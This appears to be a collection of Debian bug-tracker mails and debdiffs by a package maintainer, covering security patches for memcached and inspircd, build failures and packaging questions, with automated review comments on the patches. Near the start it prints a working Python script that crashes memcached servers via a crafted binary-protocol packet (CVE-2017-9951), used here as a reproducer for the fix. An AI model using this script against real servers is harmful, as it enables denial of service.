memcached-1.4.21/debian/patches/series --- memcached-1.4.21/debian/patches/series 2016-11-01 21:10:45.0 + +++ memcached-1.4.21/debian/patches/series 2017-07-24 20:07:26.0 + 
@@ -5,3 +5,4 @@ 06_eol_comment_handling.patch 07_disable_tests.patch 08_CVE-2016-8704_CVE-2016-8705_CVE-2016-8706.patch +09_CVE-2017-9951.patch #!/usr/bin/python # thanks https://packetstormsecurity.com/files/121445/killthebox.py.txt && # https://www.twistlock.com/2017/07/13/cve-2017-9951-heap-overflow-memcached-server-1-4-38-twistlock-vulnerability-report/ import sys import socket print "Memcached Remote DoS" if len(sys.argv) != 3: print "Usage: %s " %(sys.argv[0]) sys.exit(1) target = sys.argv[1] port = sys.argv[2] print "[+] Target Host: %s" %(target) print "[+] Target Port: %s" %(port) kill = """\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff""" kill +="""\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00""" kill +="""\x00\xff\xff\xff\xff\x01\x00\x00\0x{}""".format("41"*1000) hax = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) try: hax.connect((target, int(port))) print "[+] Connected, firing payload!" except: print "[-] Connection Failed... Is there even a target?" sys.exit(1) try: hax.send(kill) print "[+] Payload Sent!" except: print "[-] Payload Sending Failure... WTF?" sys.exit(1) hax.close() print "[*] Should be dead..." <26 new auto-negotiating client connection 26: going from conn_new_cmd to conn_waiting 26: going from conn_waiting to conn_read 26: going from conn_read to conn_parse_cmd 26: Client using the binary protocol <26 Read binary protocol data: <260x80 0x12 0x00 0x01 <260x08 0x00 0x00 0x00 <260xff 0xff 0xff 0xe8 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 <260x00 0x00 0x00 0x00 26: going from conn_parse_cmd to conn_nread <26 ADD x Value len is -33 >26 Writing an error: Out of memory allocating item >26 Writing bin response: >26 0x81 0x12 0x00 0x00 >26
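Review bot: the new debian/changelog entry for 1.4.21-1.1+deb8u2 names unstable as its distribution, while the entry directly below it (1.4.21-1.1+deb8u1) went to jessie-security; a +deb8u2 version should name the jessie suite it is meant for, not unstable. The entry also keeps the line "Non-maintainer upload by the Security Team.", which is only accurate if the Security Team is the one uploading, so it is better left for them to add.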
Bug#853544: memcached: ftbfs with GCC-7
tags 853544 + pending
thanks

On Tue, 21 Mar 2017 21:37:27 +0100 Guillaume Delacour <g...@iroqwa.org> wrote:
> tags 853544 upstream fixed-upstream
> thanks
>
>
> All is now fine with release 1.4.36
> (https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b),
> will be released after the freeze in unstable.
>

I've prepared version 1.5.0, which will be uploaded soon.

--
Guillaume Delacour
Bug#869479: memcached: New upstream version available
tags 869479 + pending
thanks

On Sun, Jul 23, 2017 at 05:14:52PM +0200, Salvatore Bonaccorso wrote:
> Source: memcached
> Severity: wishlist
>
> Hi

Hi,

>
> There is a new upstream version available, v1.5.0. Could you please
> package the new version?

I've prepared it on mentors [0] and my current mentor will upload it soon,
surely at the end of this week.

[0]: https://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.5.0-1.dsc

>
> Regards,
> Salvatore
>

--
Guillaume Delacour
Bug#842634: Bug#851877: fails every time
Hi,

On 15/05/2017 at 00:50, Adam Borowski wrote:
>
> So it's a fully _reproducible_ bug, with a well-defined immediate cause
> (even if we haven't identified the indirect cause yet) -- unlike the
> original report by Santiago Villa. Thus, it looks we have two different
> bugs that just happen to trigger the same failure mode.
>
> And thus, even if we fix the schroot issue, Santiago's bug likely won't be
> fixed.
>
>> Now, the next question is: where does this /etc/hosts come from? The file
>> is present in the above form directly after unpacking the schroot tarball,
>> before even entering the schroot.
>
>> Running debootstrap does not produce an /etc/hosts in --variant=minbase and
>> --variant=buildd. When run without --variant, it does produce an
>> /etc/hosts, but that looks correct:
> [snip]
>> So, where does the file get mangled? I can’t find any traces in the schroot
>> and sbuild sources. Does anyone know by chance?
>
> Even more puzzling: I just recreated the chroot again, and despite using the
> very same command to do so as before (last on 2017-05-04) there's no
> /etc/hosts in the chroot now, which makes sslh build correctly.
>
> The version from 2017-05-04 includes has an /etc/hosts, with ::1 replaced by
> 127.0.0.1 just as you noticed. And I see no uploads of debootstrap, sbuild,
> schroot or a package that looks related in that time period.
>
> Got an unrelated big build running at the moment, once it's done I'll boot
> from a snapshot (got backups from 2017-05-01 (plus earliers) and dailies
> since 2017-05-06) to see if it's a matter of an installed package.
>
> But again, this is probably unrelated to Santiago's bug other than for the
> results.

As this bug is not related to the sslh package itself, I've removed the
pending tag, I let Michael revert
https://anonscm.debian.org/cgit/collab-maint/sslh.git/commit/?id=243bb3faa682afa8168664eaf5a4f72cfc21ee27
and closing this bug to disable the autoremoval in testing.

--
Guillaume Delacour
Bug#851877: fails every time
Hi,

On Sat, 6 May 2017 20:57:44 +0200 Adam Borowski <kilob...@angband.pl> wrote:
> On Sat, May 06, 2017 at 08:00:11PM +0200, Michael Stapelberg wrote:
> > Thanks. It seems like getaddrinfo() is returning two results when resolving
> > localhost. Can you provide the contents of your hostname resolution-related
> > configuration please? I.e., /etc/hosts, /etc/resolv.conf,
> > /etc/nsswitch.conf, anything else you might have tweaked in that area.
>
> nsswitch.conf: always default.
>
>
> amd64 (100% fails on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> 127.0.1.1 umbar.angband.pl umbar
> #lots of commented out stuff
>
> # The following lines are desirable for IPv6 capable hosts
> ::1 localhost ip6-localhost ip6-loopback
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> +--[ /etc/resolv.conf ]
> domain angband.pl
> search angband.pl
> nameserver 2001:6a0:118::3:2
> `
>
> armhf (100% fails on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> ::1 localhost ip6-localhost ip6-loopback
> fe00::0 ip6-localnet
> ff00::0 ip6-mcastprefix
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
>
> 127.0.0.1 kholdan kholdan.angband.pl
> 2001:6a0:118::3:6 narchost
> #2001:6a0:118::3:3 apt.angband.pl
> +--[ /etc/resolv.conf ]
> domain angband.pl
> search angband.pl
> nameserver 10.0.1.2
> `
>
> arm64 (100% ok on all chroots):
> .--[ /etc/hosts ]
> 127.0.0.1 localhost
> 127.0.1.1 sirius.angband.pl sirius
>
> # The following lines are desirable for IPv6 capable hosts
> ::1 localhost ip6-localhost ip6-loopback
> fe00::0 ip6-localnet
> ff00::0 ip6-mcastprefix
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> +--[ /etc/resolv.conf ]
> domain angband.pl
> nameserver 10.0.1.2
> nameserver 2001:6a0:118::3:2
> `
>

I've also spent time to reproduce this and despite my attempt to disable
localhost IPv6 resolution [0], I already encountered issues for echosrv on ::1.
You can also try to replace any occurrence of `localhost` on t file by
127.0.0.1.
If the testsuite causes trouble, I'll disable IPv6 completely even on loopback
(I didn't like the idea at first glance because I want to keep the testsuite as
close as upstream ships it).
Then, any other special configurations in /etc/gai.conf?

[0]: https://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/patches/ftbfs_localhost.diff

--
Guillaume Delacour
Bug#856568: memcached: Permission error creating pidfile with systemd
tags 856568 moreinfo
thanks

Hi,

On Thu, Mar 02, 2017 at 04:04:33PM +0100, Teun wrote:
> After adding the option: "-P /var/run/memcached.pid" to '/etc/memcached.conf',
> I get the following error:
>
> systemd-memcached-wrapper[2577]: Could not open the pid file
> /var/run/memcached.pid.tmp for writing: Permission denied
>

Is there any reason to have a pid file for a systemd-managed service? Systemd handles a crash of the process well:

# pkill -9 memcached
# service memcached status
● memcached.service - memcached daemon
   Loaded: loaded (/lib/systemd/system/memcached.service; enabled)
   Active: failed (Result: signal) since Tue 2017-03-21 23:12:47 GMT; 2s ago
  Process: 4204 ExecStart=/usr/share/memcached/scripts/systemd-memcached-wrapper /etc/memcached.conf (code=killed, signal=KILL)
 Main PID: 4204 (code=killed, signal=KILL)

Mar 21 23:11:46 jessie systemd[1]: Started memcached daemon.
Mar 21 23:12:47 jessie systemd[1]: memcached.service: main process exited, code=killed, status=9/KILL
Mar 21 23:12:47 jessie systemd[1]: Unit memcached.service entered failed state.

As the official systemd documentation says [1][2], it is recommended to use PIDFile if the service forks and exits at startup. The systemd wrapper script does not exit after startup and can run in the foreground.

[1]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#Type=
[2]: https://www.freedesktop.org/software/systemd/man/systemd.service.html#PIDFile=

-- 
Guillaume Delacour
signature.asc Description: Digital signature
Bug#853544: memcached: ftbfs with GCC-7
tags 853544 upstream fixed-upstream
thanks

On Tue, 31 Jan 2017 09:33:50 + Matthias Klose <d...@debian.org> wrote:
> items.c:730:45: error: '%d' directive output truncated writing between 10 and
> 11 bytes into a region of size 8 [-Werror=format-truncation=]
> snprintf(key, sizeof(key), "%d", i * 32);
> ^~
> items.c:730:44: note: using the range [-2147483648, 2147483647] for directive
> argument
> snprintf(key, sizeof(key), "%d", i * 32);
> ^~~~
> In file included from /usr/include/stdio.h:938:0,
> from /usr/include/event2/event.h:195,
> from /usr/include/event.h:71,
> from memcached.h:16,
> from items.c:2:
> /usr/include/x86_64-linux-gnu/bits/stdio2.h:64:10: note: format output
> between 11 and 12 bytes into a destination of size 8
>return __builtin___snprintf_chk (__s, __n, __USE_FORTIFY_LEVEL - 1,
> ^~~~
> __bos (__s), __fmt, __va_arg_pack ());
> ~
> items.c: In function 'item_stats_sizes':
> items.c:730:45: error: '%d' directive output truncated writing between 10 and
> 11 bytes into a region of size 8 [-Werror=format-truncation=]
> snprintf(key, sizeof(key), "%d", i * 32);
> ^~
> items.c:730:44: note: using the range [-2147483648, 2147483647] for directive
> argument
> snprintf(key, sizeof(key), "%d", i * 32);
> ^~~~
> In file included from /usr/include/stdio.h:938:0,
> from /usr/include/event2/event.h:195,
> from /usr/include/event.h:71,
> from memcached.h:16,

All is now fine with release 1.4.36 (https://github.com/memcached/memcached/commit/64bbbf4c7655a540247db4b608b00f809742f24b), will be released after the freeze in unstable.

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#842812: memcached: CVE-2016-8705
Fix is the same as #842814.

On Tue, 01 Nov 2016 14:05:19 +0100 Salvatore Bonaccorso <car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
>
> Hi,
>
> the following vulnerability was published for memcached.
>
> CVE-2016-8705[0]:
> Memcached Server Update Remote Code Execution Vulnerability
>
> It is reproducible with the (fixed) reproducer on the TALOS site, when
> running under valgrind easily.
>
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8705
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0220/
>
> Please adjust the affected versions in the BTS as needed.
>
> Regards,
> Salvatore
>
>

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#842811: memcached: CVE-2016-8704
Fix is the same as for #842814.

On Tue, 01 Nov 2016 14:00:07 +0100 Salvatore Bonaccorso <car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
>
> Hi,
>
> the following vulnerability was published for memcached.
>
> CVE-2016-8704[0]:
> Memcached Server Append/Prepend Remote Code Execution Vulnerability
>
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8704
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0219/
>
> Please adjust the affected versions in the BTS as needed.
>
> Regards,
> Salvatore
>
>

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#842814: memcached: CVE-2016-8706
Please see attached the debdiff.
Also, please note that I can't upload myself to security-master as I'm not a DD nor DM.

On Tue, 01 Nov 2016 14:08:44 +0100 Salvatore Bonaccorso <car...@debian.org> wrote:
> Source: memcached
> Version: 1.4.31-1
> Severity: important
> Tags: security upstream
>
> Hi,
>
> the following vulnerability was published for memcached.
>
> CVE-2016-8706[0]:
> |Memcached Server SASL Autentication Remote Code Execution
> |Vulnerability
>
> It is easily reproducible with the TALOS reproducer when memcached
> enabled SASL authentication and running under valgrind to see the
> crash.
>
> If you fix the vulnerability please also make sure to include the
> CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
>
> For further information see:
>
> [0] https://security-tracker.debian.org/tracker/CVE-2016-8706
> [1] http://www.talosintelligence.com/reports/TALOS-2016-0221/
>
> Please adjust the affected versions in the BTS as needed.
>
> Regards,
> Salvatore
>
>

-- 
Guillaume Delacour
diff -Nru memcached-1.4.21/debian/changelog memcached-1.4.21/debian/changelog --- memcached-1.4.21/debian/changelog 2015-03-07 13:01:25.0 + +++ memcached-1.4.21/debian/changelog 2016-11-03 02:14:20.0 + 
@@ -1,3 +1,12 @@ +memcached (1.4.21-1.1+deb8u1) jessie-security; urgency=high + + * CVE-2016-8704: Fix Append/Prepend Remote Code Execution (Closes: #842811) + * CVE-2016-8705: Fix Update Remote Code Execution (Closes: #842812) + * CVE-2016-8706: Fix SASL Authentication Remote Code Execution +(Closes: #842814) + + -- Guillaume Delacour <g...@iroqwa.org> Thu, 03 Nov 2016 02:26:55 +0100 + memcached (1.4.21-1.1) unstable; urgency=medium * Non-maintainer upload. diff -Nru memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch --- memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch 1970-01-01 00:00:00.0 + +++ memcached-1.4.21/debian/patches/08_CVE-2016-8704_8705_8706.patch 2016-11-03 01:31:47.0 + 
@@ -0,0 +1,50 @@ +From bd578fc34b96abe0f8d99c1409814a09f51ee71c Mon Sep 17 00:00:00 2001 +From: dormando <dorma...@rydia.net> +Date: Wed, 12 Oct 2016 13:50:47 -0700 +Subject: [PATCH] CVE reported by cisco talos +Origin: upstream, +https://github.com/memcached/memcached/commit/bd578fc34b96abe0f8d99c1409814a09f51ee71c +Last-Update: 2016-11-03 + +--- + items.c | 3 +++ + memcached.c | 10 -- + 2 files changed, 11 insertions(+), 2 deletions(-) + +diff --git a/items.c b/items.c +index 9e6d921..a1cca4a 100644 +--- a/items.c b/items.c +@@ -148,6 +148,9 @@ item *do_item_alloc(char *key, const size_t nkey, const unsigned int flags, + uint8_t nsuffix; + item *it = NULL; + char suffix[40]; ++if (nbytes < 2 || nkey < 0) ++return 0; ++ + size_t ntotal = item_make_header(nkey + 1, flags, nbytes, suffix, ); + if (settings.use_cas) { + ntotal += sizeof(uint64_t); +diff --git a/memcached.c b/memcached.c +index dc1f636..ad423a0 100644 +--- a/memcached.c b/memcached.c +@@ -1997,10 +1997,16 @@ static bool authenticated(conn *c) { + static void dispatch_bin_command(conn *c) { + int protocol_error = 0; + +-int extlen = c->binary_header.request.extlen; +-int keylen = c->binary_header.request.keylen; ++uint8_t extlen = c->binary_header.request.extlen; ++uint16_t keylen = c->binary_header.request.keylen; + uint32_t bodylen = c->binary_header.request.bodylen; + ++if (keylen > bodylen || keylen + extlen > bodylen) { ++write_bin_error(c, PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, NULL, 0); ++c->write_and_go = conn_closing; ++return; ++} ++ + if (settings.sasl && !authenticated(c)) { + write_bin_error(c, PROTOCOL_BINARY_RESPONSE_AUTH_ERROR, NULL, 0); + c->write_and_go = conn_closing; diff -Nru memcached-1.4.21/debian/patches/series memcached-1.4.21/debian/patches/series --- memcached-1.4.21/debian/patches/series 2015-03-07 13:01:25.0 + +++ memcached-1.4.21/debian/patches/series 2016-11-03 01:32:38.0 + 
@@ -4,3 +4,4 @@ 04_add_init_retry.patch 06_eol_comment_handling.patch 07_disable_tests.patch +08_CVE-2016-8704_8705_8706.patch signature.asc Description: OpenPGP digital signature
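Review bot: in the items.c hunk of 08_CVE-2016-8704_8705_8706.patch, the `nkey < 0` half of `if (nbytes < 2 || nkey < 0)` can never be true, because the hunk header shows `nkey` declared as `const size_t`; only `nbytes < 2` does any work. If a bound on the key length is intended it needs a different comparison, otherwise the dead test should be dropped. The early exit also returns `0` from a function returning `item *`, where `NULL` would match the `item *it = NULL;` line just above it.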
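Review bot: in the dispatch_bin_command() hunk of the same patch, the first half of `keylen > bodylen || keylen + extlen > bodylen` is implied by the second, since `extlen` is now a `uint8_t` and cannot be negative; the single test `keylen + extlen > bodylen` says the same thing. A one-line comment stating the invariant (key plus extras must fit inside the body) would help, because the rest of the binary-protocol handling relies on it, and the comment could also say why a length mismatch is answered with PROTOCOL_BINARY_RESPONSE_UNKNOWN_COMMAND, which will read oddly in client-side logs.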
Bug#836706: certificate spoofing via crafted SASL messages
Please see attached the debdiff.
Also, please note that I can't upload myself to security-master as I'm not a DD nor DM.

On 06/09/2016 at 00:02, Guillaume Delacour wrote:
>
>
> On 05/09/2016 at 22:41, James Lu wrote:
>> Hi,
>
> Hi,
>
>>
>> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is
>> this commit
>> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a
>
> Yes, I've talked to upstream a few hours ago to include this particular
> fix to 2.0.17; upload of 2.0.23 will follow to unstable.
>
>>
>> Best,
>> James
>>
>

-- 
Guillaume Delacour
diff -Nru inspircd-2.0.17/debian/changelog inspircd-2.0.17/debian/changelog --- inspircd-2.0.17/debian/changelog2016-03-22 19:31:22.0 +0100 +++ inspircd-2.0.17/debian/changelog2016-09-06 21:29:13.0 +0200 @@ -1,3 +1,10 @@ +inspircd (2.0.17-1+deb8u2) jessie-security; urgency=high + + * m_sasl: don't allow AUTHENTICATE with mechanisms with a space +(CVE-2016-7142) + + -- Guillaume Delacour <g...@iroqwa.org> Tue, 06 Sep 2016 01:58:19 +0200 + inspircd (2.0.17-1+deb8u1) jessie-security; urgency=high * Non-maintainer upload by the Wheezy LTS Team. diff -Nru inspircd-2.0.17/debian/patches/CVE-2016-7142.patch inspircd-2.0.17/debian/patches/CVE-2016-7142.patch --- inspircd-2.0.17/debian/patches/CVE-2016-7142.patch 1970-01-01 01:00:00.0 +0100 +++ inspircd-2.0.17/debian/patches/CVE-2016-7142.patch 2016-09-06 21:29:13.0 +0200 
@@ -0,0 +1,31 @@ +From 74fafb7f11b06747f69f182ad5e3769b665eea7a Mon Sep 17 00:00:00 2001 +From: Adam <a...@anope.org> +Date: Fri, 2 Sep 2016 22:57:03 -0400 +Subject: [PATCH] m_sasl: don't allow AUTHENTICATE with mechanisms with a space + +--- + src/modules/m_sasl.cpp | 4 + 1 file changed, 4 insertions(+) + +diff --git a/src/modules/m_sasl.cpp b/src/modules/m_sasl.cpp +index 9cb5592..16a1535 100644 +--- a/src/modules/m_sasl.cpp b/src/modules/m_sasl.cpp +@@ -189,6 +189,7 @@ class CommandAuthenticate : public Command + : Command(Creator, "AUTHENTICATE", 1), authExt(ext), cap(Cap) + { + works_before_reg = true; ++ allow_empty_last_param = false; + } + + CmdResult Handle (const std::vector& parameters, User *user) +@@ -199,6 +200,9 @@ class CommandAuthenticate : public Command + if (!cap.ext.get(user)) + return CMD_FAILURE; + ++ if (parameters[0].find(' ') != std::string::npos || parameters[0][0] == ':') ++ return CMD_FAILURE; ++ + SaslAuthenticator *sasl = authExt.get(user); + if (!sasl) + authExt.set(user, new SaslAuthenticator(user, parameters[0])); diff -Nru inspircd-2.0.17/debian/patches/series inspircd-2.0.17/debian/patches/series --- inspircd-2.0.17/debian/patches/series 2016-03-22 19:29:23.0 +0100 +++ inspircd-2.0.17/debian/patches/series 2016-09-06 22:55:05.0 +0200 @@ -2,3 +2,4 @@ 01_dpkg-buildflags_support.diff 03_gnutls_crypt_api_instead_gcrypt.diff CVE-2015-8702.patch +CVE-2016-7142.patch signature.asc Description: OpenPGP digital signature
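Review bot: the second m_sasl.cpp hunk refuses a first parameter that starts with ':' as well as one containing a space, but the patch subject and the debian/changelog entry mention only the space. A short comment above the new `if` saying why both forms are rejected, and a mention of the ':' case in the changelog, would make the fix auditable later. The `parameters[0][0]` read also leans on the `allow_empty_last_param = false;` line added in the constructor hunk, so the two hunks need to stay together if this patch is ever refreshed or split.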
Bug#836706: certificate spoofing via crafted SASL messages
On 05/09/2016 at 22:41, James Lu wrote:
> Hi,

Hi,

>
> Just to narrow things down a bit, the relevant fix for InspIRCd 2.0 is
> this commit
> https://github.com/inspircd/inspircd/commit/74fafb7f11b06747f69f182ad5e3769b665eea7a

Yes, I've talked to upstream a few hours ago to include this particular fix to 2.0.17; upload of 2.0.23 will follow to unstable.

>
> Best,
> James
>

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5
On Sat, 31 Oct 2015 15:15:33 +0100 Guillaume Delacour <g...@iroqwa.org> wrote:
>
> Upstream seems to have modified qstat.c to include strndup() only if
> needed in recent version of qstat :
>
> https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859

I've uploaded a fix on mentors: http://mentors.debian.net/debian/pool/main/q/qstat/qstat_2.15-2.dsc. I'm waiting for Jordi to upload it to the archive.

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#809008: inspircd: FTBFS: rmdir: failed to remove '[..]/debian/inspircd/usr/lib/inspircd/data': No such file or directory
retitle 809008 "FTBFS with perl 5.22: Calling POSIX::tmpnam() is deprecated"
thanks

On 26/12/2015 at 04:26, Chris Lamb wrote:
> Source: inspircd
> Version: 2.0.20-4
> Severity: serious
> Justification: fails to build from source
> User: reproducible-bui...@lists.alioth.debian.org
> Usertags: ftbfs
> X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org
>
> Dear Maintainer,
>
> inspircd fails to build from source in unstable/amd64:
>
> [..]
> # delete empty data and log dir
> rmdir
> /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data
> \
>
> /home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs
> rmdir: failed to remove
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/data':
> No such file or directory
> rmdir: failed to remove
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20/debian/inspircd/usr/lib/inspircd/logs':
> No such file or directory
> debian/rules:51: recipe for target 'override_dh_auto_install' failed
> make[1]: *** [override_dh_auto_install] Error 1
> make[1]: Leaving directory
> '/home/lamby/temp/cdt.20151226032303.NJlegBmZbO/inspircd-2.0.20'
> debian/rules:81: recipe for target 'binary' failed
> make: *** [binary] Error 2
>
> [..]
>
> The full build log is attached.

The real problem is:

[...]
Evaluating perl code for module m_pgsql.cpp ...
Configuration failed. The following error occured:

Calling POSIX::tmpnam() is deprecated at make/utilities.pm line 407, line 32.
[...]

Upstream uses POSIX::tmpnam in this file, which seems (I can't find any other pointer than [1]) to be deprecated since perl 5.22; I'll propose that they use File::Temp instead and prepare a new -4 version.

[1]: https://metacpan.org/pod/distribution/perl/ext/POSIX/lib/POSIX.pod#FUNCTIONS

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#784357: memcached multi instance startup/shutdown broken
tags 784357 +help

Hi,

On Wed, 16 Dec 2015 14:26:38 -0500 Jonathan Champ <roya...@gmail.com> wrote:
> Ran into this again today. Hope there's been some progress?

Not for the moment; I'm sorry that the only way I can propose for now is to create one systemd unit file per instance needed.
I'll try to find a solution in the middle of January.

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#804010: New version 1.0.1 available
On Wed, Nov 04, 2015 at 09:16:04AM +0100, Sebastien Bacher wrote:
> Package: gdisk
> Version: 1.0.0-3
>
> There is a new 1.0.1 version available that fixes some EFI issues and
> potential segfaults on some architectures, it would be nice to have that
> update in Debian

Sure, I prepared this package a few days ago on mentors: http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_1.0.1-1.dsc

My main sponsor hasn't replied to me yet; you can review the package and upload it if you have some time. Thanks in advance.

-- 
Guillaume Delacour
signature.asc Description: Digital signature
Bug#789860: php5-imagick: Segmentation fault when accessing an unknown property
fixed 789860 3.2.0~rc1-1
thanks

Hi,

It seems to be unreproducible in versions:
- 3.2.0~rc1-1 (stable)
- 3.3.0~rc2-1 (testing/unstable)

On 24/06/2015 at 23:37, Jerry wrote:
> Package: php5-imagick
> Version: 3.1.0~rc1-1+b2
> Severity: normal
>
> The following code produces a segmentation fault:
>
> <?php
> $im = new \Imagick;
> $im->foo;
> ?>
>
> It can also be reproduces on the command line:
>
> jerry@box:~$ php -r '$im = new \Imagick(); $im->foo;'
> Segmentation fault
>
> -- System Information:
> Debian Release: 7.8
> APT prefers oldstable-updates
> APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
> Architecture: i386 (i686)
>
> Kernel: Linux 2.6.32-30-pve (SMP w/2 CPU cores)
> Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
> Shell: /bin/sh linked to /bin/dash
>
> Versions of packages php5-imagick depends on:
> ii libc6 2.13-38+deb7u8
> ii libmagickcore5 8:6.7.7.10-5+deb7u3
> ii libmagickwand5 8:6.7.7.10-5+deb7u3
> ii php5-cli [phpapi-20100525+lfs] 5.4.41-0+deb7u1
> ii php5-common 5.4.41-0+deb7u1
> ii php5-fpm [phpapi-20100525+lfs] 5.4.41-0+deb7u1
> ii ucf 3.0025+nmu3
>
> Versions of packages php5-imagick recommends:
> ii ghostscript 9.05~dfsg-6.3+deb7u1
> ii ttf-dejavu-core 2.33-3
>
> php5-imagick suggests no packages.
>
> -- no debconf information
>

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#790275: qstat: FTBFS with glibc 2.21 and gcc-5
tag 790275 fixed-upstream
thanks

On Sat, 27 Jun 2015 13:08:22 -0700 Daniel Schepler <dschep...@gmail.com> wrote:
> Source: qstat
> Version: 2.15-1
> Severity: normal
>
> From my pbuilder build log, using a setup preferring glibc and gcc-defaults
> from experimental:
>
> ...
> gcc -DHAVE_CONFIG_H -I. -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG
> -DENABLE_DUMP -g -O2 -fstack-protector-strong -Wformat
> -Werror=format-security -Wall -c -o md5.o md5.c
> gcc -DHAVE_CONFIG_H -I. -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG
> -DENABLE_DUMP -g -O2 -fstack-protector-strong -Wformat
> -Werror=format-security -Wall -c -o qserver.o qserver.c
> gcc -DHAVE_CONFIG_H -I. -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG
> -DENABLE_DUMP -g -O2 -fstack-protector-strong -Wformat
> -Werror=format-security -Wall -c -o qstat.o qstat.c
> In file included from /usr/include/string.h:634:0,
> from qstat.c:31:
> qstat.c:2633:7: error: expected identifier or '(' before '__extension__'
> char *strndup(const char *string, size_t len);
>^
> qstat.c: In function 'do_work':
> qstat.c:3104:18: warning: variable 'fd' set but not used
> [-Wunused-but-set-variable]
> int pktlen, rc, fd;
> ^
> qstat.c: In function 'deal_with_ghostrecon_packet':
> qstat.c:9789:26: warning: variable 'end' set but not used
> [-Wunused-but-set-variable]
> char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer;
> ^
> qstat.c:9789:18: warning: variable 'start' set but not used
> [-Wunused-but-set-variable]
> char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer;
> ^
> In file included from /usr/include/string.h:634:0,
> from qstat.c:31:
> qstat.c: At top level:
> qstat.c:12121:7: error: expected identifier or '(' before '__extension__'
> char *strndup(const char *string, size_t len)

Upstream seems to have modified qstat.c to include strndup() only if needed in recent version of qstat :

https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859

>^
> Makefile:543: recipe for target 'qstat.o' failed
> make[3]: *** [qstat.o] Error 1
> make[3]: Leaving directory '/tmp/buildd/qstat-2.15'
> Makefile:580: recipe for target 'all-recursive' failed
> make[2]: *** [all-recursive] Error 1
> make[2]: Leaving directory '/tmp/buildd/qstat-2.15'
> Makefile:397: recipe for target 'all' failed
> make[1]: *** [all] Error 2
> make[1]: Leaving directory '/tmp/buildd/qstat-2.15'
> dh_auto_build: make -j1 returned exit code 2
> debian/rules:4: recipe for target 'build' failed
> make: *** [build] Error 2
> dpkg-buildpackage: error: debian/rules build gave error exit status 2
> E: Failed autobuilding of package
> --
> Daniel Schepler
>
>

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#800650: Create development header packages
On 02/10/2015 at 08:09, Michael D wrote:
> Package: inspircd
> Severity: |wishlist|
>
> Hi All,
>
> I was wondering if there was any interest in creating an inspircd-dev
> package that simply copies over the include/ folder to
> /usr/include/inspircd/ ?

This can be useful if there are some other (external?) extensions that need to be compiled for inspircd. I have enabled most (if not all) extensions provided as modules [1]; do you have an example of an external module?

[1]: http://sources.debian.net/src/inspircd/2.0.20-3/debian/rules/#L19-L24

> Should be simple enough, I can include a patch if really needed.
>

-- 
Guillaume Delacour
signature.asc Description: OpenPGP digital signature
Bug#784915: jessie-pu: package rsnapshot/1.3.1-4
Hi,

On 21/08/2015 at 16:34, Adam D. Barratt wrote:
>
> The package in unstable and testing appears to have been fixed now.
>
>> In either case, when it comes to an update in stable we'll need a source
>> debdiff of the proposed updated package, built and tested in a Jessie
>> environment, rather than pointers to online patches.
>
> This is still true, however.

Please find attached a debdiff that fixes the problem in Jessie.
